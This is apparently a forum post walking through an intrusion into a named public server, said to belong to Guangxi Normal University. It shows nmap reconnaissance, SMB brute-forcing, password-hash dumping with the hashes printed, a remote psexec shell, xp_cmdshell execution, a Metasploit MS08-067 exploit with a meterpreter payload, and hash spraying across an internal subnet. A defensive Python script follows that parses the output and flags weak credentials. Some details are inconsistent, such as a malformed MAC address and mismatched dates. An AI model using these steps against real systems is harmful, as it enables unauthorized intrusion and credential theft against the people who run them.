nmap + msf intrusion into Guangxi Normal

Posted on 2012-12-4 12:46:42
Guangxi Normal website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to scan for the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute commands

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
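Read from the defender's side, the smb-brute and smb-pwdump results in this post are a credential-hygiene report for the host: a blank Administrator password, a wordlist password, and LM hashes still being stored on a Windows 2000 box. As an added example that is not part of the original post, this Python script parses that nmap host-script output (copied from the post above) and flags each of those conditions; the `EMPTY_LM_HALF` constant is the well-known LM hash of an empty 7-byte half-block, which marks passwords of at most 7 characters.

```python
import re

# Nmap host-script output copied from the smb-brute and smb-pwdump runs
# shown in the post above (the author's lab host).
SAMPLE_OUTPUT = """\
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# LM hashes are built from two independent 7-byte halves; this constant is
# the hash of an all-zero (empty) half, so a stored LM hash ending in it
# belongs to a password of at most 7 characters.
EMPTY_LM_HALF = "AAD3B435B51404EE"

# "|   user:password => Login was successful" lines from smb-brute
BRUTE_RE = re.compile(r"^\|_?\s*(\S+):(\S+) => Login was successful")
# "| user:rid => LMHASH:NTHASH" lines from smb-pwdump
PWDUMP_RE = re.compile(r"^\|_?\s*(\S+):(\d+) => ([^:]+):(.+)$")


def audit(text):
    """Return (account, finding) pairs for every weakness in the output."""
    findings = []
    for line in text.splitlines():
        m = BRUTE_RE.match(line)
        if m:
            user, password = m.groups()
            if password == "<blank>":
                findings.append((user, "blank password accepted over SMB"))
            else:
                findings.append((user, "password found in wordlist"))
            continue
        m = PWDUMP_RE.match(line)
        if not m:
            continue
        user, _rid, lm_hash, _nt_hash = m.groups()
        if lm_hash.startswith("NO PASSWORD"):
            findings.append((user, "empty password hash"))
            continue
        # Any real LM hash means LM hash storage is still enabled.
        findings.append((user, "LM hash stored"))
        if lm_hash.upper().endswith(EMPTY_LM_HALF):
            findings.append((user, "password is at most 7 characters"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(SAMPLE_OUTPUT):
        print(f"{account:16} {finding}")
```

Each finding maps to a fix the post itself implies: set passwords on every account, drop the wordlist-grade ones, and disable LM hash storage so a dump yields only NT hashes.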